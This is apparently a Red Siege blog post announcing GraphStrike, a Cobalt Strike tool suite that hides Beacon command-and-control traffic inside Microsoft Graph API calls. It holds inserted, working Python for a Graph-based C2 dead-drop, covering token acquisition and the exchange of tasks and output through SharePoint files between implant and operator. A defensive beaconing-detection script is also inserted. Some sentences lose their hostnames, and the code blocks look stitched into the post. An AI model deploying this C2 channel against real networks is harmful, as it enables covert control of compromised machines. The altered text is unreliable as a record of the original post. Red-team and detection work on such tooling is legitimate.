GraphStrike: Using Microsoft Graph API to Make Beacon Traffic Disappear

By Red Siege | January 22, 2024

By: Alex Reid, Current Red Siege Intern

We at Red Siege are proud to introduce GraphStrike: a tool suite for use with Cobalt Strike that enables Beacons to use Microsoft Graph API for HTTPS C2 communications. All implant traffic will route through and become very difficult to identify as Beacon uses legitimate methods to interact with Microsoft Cloud resources.

In the offensive security world, when evasion is brought up it is usually in the context of Anti-Virus (AV) or Endpoint Detection and Response (EDR). Host-based detections remain the chief concern for most offensive security engineers when designing malware or other tooling, but organizations are increasingly complementing their security stacks with mature network-based detection capabilities. Network evasion isn’t a new concept: the commercial Command and Control (C2) software Cobalt Strike added Malleable C2 profiles, which let operators customize the appearance of Beacon’s network traffic, back in 2014. In the intervening years, however, the capability and fidelity of network-based monitoring and detection mechanisms have progressed to the point that they now present a real challenge during offensive operations.

Advanced Persistent Threats (APTs) and other real-world threat actors have also taken notice, increasingly turning to commercial third-party services like Slack, Discord, Google Drive, and Telegram to smuggle their C2 traffic out of a compromised network without detection. Legitimate services are incredibly attractive for C2 purposes, since aggressors can borrow their reputation to blend in and avoid scrutiny. While the options are myriad, Microsoft services are particularly attractive for this purpose because programs like Microsoft Teams, Outlook, and OneDrive are so ubiquitous that traffic to their back ends is expected on nearly every corporate network. To make things easier, all of these services can be accessed and manipulated via Microsoft Graph API. From Microsoft:

Microsoft Graph is a RESTful web API that enables you to access Microsoft Cloud service resources.

APTs have been observed deploying malware that uses Graph API for C2 in campaigns over the past several years. Examples include:

  1. BLUELIGHT – APT37/InkySquid/ScarCruft

  2. Graphite – APT28/Fancy Bear

  3. Graphican – APT15/Nickel/The Flea

  4. SiestaGraph – UNKNOWN

Network traffic addressed to Microsoft-owned domains and IPs is extremely unlikely to draw attention, and it can be very difficult to distinguish legitimate use of Graph API within a network from illegitimate use. As offensive security professionals we are in the business of adversary emulation, but implementing third-party services for C2 can be challenging, both technically and in terms of the time and resources required. To address these challenges and enable authorized red teams to easily bring advanced adversarial tradecraft to the table, Red Siege is pleased to announce the release of GraphStrike.

GraphStrike is a tool suite for use with Cobalt Strike that enables Beacons to use Graph API for HTTPS C2 communications. It includes a provisioner to easily set up required assets, both locally and in Azure, with the only real prerequisite being a Microsoft tenant with a SharePoint site:
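To make the pattern concrete, here is an added example (not GraphStrike's code, and not a description of its internals) of the kind of exchange a Graph-backed C2 channel performs: the implant authenticates to the tenant with an app registration's client credentials, then trades messages with the operator as files in the SharePoint site's default document library. The tenant, client and site identifiers and the `{beacon}_in` / `{beacon}_out` file naming are assumptions chosen for illustration; the HTTP transport is injectable, so the whole exchange runs offline against the in-memory fake at the bottom.

```python
"""Graph API as a file dead-drop between an implant and its operator.

Added example; not GraphStrike's own code. The file-per-direction layout and
the identifiers are assumptions made for illustration. The transport is
injectable so the exchange can be exercised offline against FakeGraph.
"""
import json
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlencode

GRAPH = "https://graph.microsoft.com/v1.0"
LOGIN = "https://login.microsoftonline.com"

# transport(method, url, headers, body) -> (status, response body)
Transport = Callable[[str, str, Dict[str, str], bytes], Tuple[int, bytes]]


def get_token(send: Transport, tenant_id: str, client_id: str, client_secret: str) -> str:
    """OAuth 2.0 client-credentials grant for the Graph .default scope."""
    body = urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default",
    }).encode()
    status, resp = send("POST", f"{LOGIN}/{tenant_id}/oauth2/v2.0/token",
                        {"Content-Type": "application/x-www-form-urlencoded"}, body)
    if status != 200:
        raise RuntimeError(f"token request failed with HTTP {status}")
    return json.loads(resp)["access_token"]


def _item(site_id: str, path: str) -> str:
    # Path-addressed item in the site's default drive (document library).
    return f"{GRAPH}/sites/{site_id}/drive/root:/{path}"


def put_file(send: Transport, token: str, site_id: str, path: str, data: bytes) -> None:
    """Create or overwrite a small (< 4 MB) file with a single PUT."""
    status, _ = send("PUT", f"{_item(site_id, path)}:/content",
                     {"Authorization": f"Bearer {token}",
                      "Content-Type": "application/octet-stream"}, data)
    if status not in (200, 201):
        raise RuntimeError(f"upload of {path} failed with HTTP {status}")


def get_file(send: Transport, token: str, site_id: str, path: str) -> Optional[bytes]:
    """Download a file's content; None when the file does not exist yet."""
    status, body = send("GET", f"{_item(site_id, path)}:/content",
                        {"Authorization": f"Bearer {token}"}, b"")
    if status == 404:
        return None
    if status != 200:
        raise RuntimeError(f"download of {path} failed with HTTP {status}")
    return body


def delete_file(send: Transport, token: str, site_id: str, path: str) -> None:
    status, _ = send("DELETE", _item(site_id, path), {"Authorization": f"Bearer {token}"}, b"")
    if status != 204:
        raise RuntimeError(f"delete of {path} failed with HTTP {status}")


def operator_queue_task(send, token, site_id, beacon_id, task: bytes) -> None:
    """Team-server side: leave a task for the implant to pick up."""
    put_file(send, token, site_id, f"{beacon_id}_in", task)


def operator_read_output(send, token, site_id, beacon_id) -> Optional[bytes]:
    """Team-server side: collect and clear the implant's last output."""
    out = get_file(send, token, site_id, f"{beacon_id}_out")
    if out is not None:
        delete_file(send, token, site_id, f"{beacon_id}_out")
    return out


def beacon_checkin(send, token, site_id, beacon_id, output: bytes) -> Optional[bytes]:
    """Implant side: post output, then poll for and consume a queued task."""
    put_file(send, token, site_id, f"{beacon_id}_out", output)
    task = get_file(send, token, site_id, f"{beacon_id}_in")
    if task is not None:
        delete_file(send, token, site_id, f"{beacon_id}_in")
    return task


class FakeGraph:
    """Constructed offline stand-in for the token endpoint and one drive."""

    def __init__(self) -> None:
        self.files: Dict[str, bytes] = {}
        self.log = []  # (method, url) of every request, for inspection

    def __call__(self, method, url, headers, body) -> Tuple[int, bytes]:
        self.log.append((method, url))
        if url.endswith("/oauth2/v2.0/token"):
            return 200, json.dumps({"token_type": "Bearer", "access_token": "fake-token"}).encode()
        if headers.get("Authorization") != "Bearer fake-token":
            return 401, b""
        path = url.split("/drive/root:/", 1)[1]
        if method == "DELETE":
            return (204, b"") if self.files.pop(path, None) is not None else (404, b"")
        path = path.rsplit(":/content", 1)[0]
        if method == "PUT":
            self.files[path] = body
            return 201, b""
        if method == "GET":
            return (200, self.files[path]) if path in self.files else (404, b"")
        return 405, b""
```

Note what the wire sees: every request goes to login.microsoftonline.com or graph.microsoft.com, carries a valid bearer token, and uses the same drive-item endpoints that OneDrive and SharePoint sync clients use, which is exactly why this blends into legitimate tenant traffic.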

After completing setup and importing a single Cobalt Strike aggressor script, Beacons generated by the Cobalt Strike Team Server will send all C2 traffic to This can be seen in the following image (you’ll need to zoom in):

Depicted is a Wireshark capture showing a DNS request for and an answer containing the corresponding IP. An HTTPS connection is then initiated to that IP, and using Process Explorer we can see that the GraphStrike.exe process initiated and holds this connection. In the bottom left of the image, a screen capture from Cobalt Strike shows a Beacon calling out from the GraphStrike.exe process and confirms that the connection seen in Wireshark belongs to the implant.
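The capture above also shows the detail that does survive on the host: the connection to Graph is owned by a process that has no business talking to it. Below is an added example (not part of this post or of GraphStrike) of turning that observation into detection logic, run over constructed per-process connection events modelled on Sysmon Event ID 3. The field names, the process allowlist, and the thresholds are assumptions to be tuned per environment.

```python
"""Flag beacon-like use of Microsoft Graph from per-process connection telemetry.

Added example; not part of the original post or of GraphStrike. Events are
constructed inline to resemble Sysmon Event ID 3 records (field names assumed).
Two signals are combined: the connecting image is not an expected Graph
consumer, and the inter-connection timing is periodic with a low coefficient
of variation, which a fixed sleep plus jitter produces and interactive Office
clients generally do not.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

GRAPH_HOSTS = {"graph.microsoft.com", "login.microsoftonline.com"}
# Assumed allowlist of images that legitimately talk to Graph; tune per estate.
EXPECTED_PROCESSES = {"outlook.exe", "teams.exe", "ms-teams.exe", "onedrive.exe",
                      "msedge.exe", "excel.exe", "winword.exe"}


def synthetic_events() -> List[Dict]:
    """Constructed sample: one beaconing unknown image, one chatty Outlook."""
    base = datetime(2024, 1, 22, 9, 0, 0)
    events = []
    t = base
    # Beacon with sleep 60 and ~10% jitter: gaps cluster tightly around 57 s.
    for gap in [60, 55, 58, 54, 60, 57, 59, 56, 55, 60]:
        t += timedelta(seconds=gap)
        events.append({"ts": t, "image": r"C:\Users\alex\GraphStrike.exe",
                       "dst": "graph.microsoft.com", "port": 443})
    t = base
    # Human-driven mail sync: bursts and long idle stretches.
    for gap in [3, 120, 7, 400, 2, 900, 15, 60, 5, 300]:
        t += timedelta(seconds=gap)
        events.append({"ts": t,
                       "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                       "dst": "graph.microsoft.com", "port": 443})
    return sorted(events, key=lambda e: e["ts"])


def periodicity(stamps: List[datetime]) -> Optional[Tuple[float, float]]:
    """Mean gap and coefficient of variation of gaps; None if too few samples."""
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    if len(gaps) < 5:
        return None
    mean = statistics.mean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def score_graph_sessions(events: List[Dict], cv_threshold: float = 0.3,
                         min_connections: int = 6) -> List[Dict]:
    """Group Graph connections by image and report the ones worth a look."""
    by_image: Dict[str, List[datetime]] = defaultdict(list)
    for e in events:
        if e["dst"].lower() in GRAPH_HOSTS and e["port"] == 443:
            by_image[e["image"]].append(e["ts"])

    findings = []
    for image, stamps in by_image.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        name = image.rsplit("\\", 1)[-1].lower()
        reasons = []
        if name not in EXPECTED_PROCESSES:
            reasons.append(f"unexpected image {name} talking to Graph")
        p = periodicity(stamps)
        if p is not None and p[1] < cv_threshold:
            reasons.append(f"periodic check-ins: mean {p[0]:.0f}s, cv {p[1]:.2f}")
        if reasons:
            findings.append({"image": image, "connections": len(stamps), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in score_graph_sessions(synthetic_events()):
        print(f["image"], f["connections"], "; ".join(f["reasons"]))
```

Periodicity alone is weak (OneDrive and Teams poll on timers too) and the allowlist alone is bypassed by injecting into an expected process, so both signals are reported together; in the constructed sample only the unknown image trips, on both counts, while Outlook's irregular sync is left alone.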

GraphStrike supports almost all native Cobalt Strike capabilities and aims to make the use of Graph API for authorized red team engagements simple, reliable, and effective.

A developer blog post detailing the design process and technical details of GraphStrike may be found at GraphStrike: Anatomy of Offensive Tool Development

GraphStrike is available for download here.


About Alex Reid, Intern:

Alex Reid is an intern at Red Siege Information Security. Alex got started in offensive security 4 years ago on the United States Navy Red Team, and has been awarded several medals by the military for his work there as an advanced capabilities developer and red team technical lead. He has presented at several DoD Red Team conferences and is an active contributor to the offensive security community via open source tooling published on his personal GitHub.
